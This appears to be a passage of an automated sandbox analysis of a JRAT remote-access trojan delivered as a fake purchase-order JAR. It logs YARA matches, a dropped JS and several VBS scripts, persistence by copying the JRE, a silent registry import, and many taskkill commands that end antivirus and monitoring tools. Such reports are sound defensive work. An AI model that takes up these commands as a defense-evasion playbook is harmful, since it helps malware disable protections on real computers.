Source: api-ms-win-core-localization-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: API-MS-Win-core-xstate-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winJAR@196/300@1/2
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe File created: C:\Users\user\zbrspjjraf.js
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
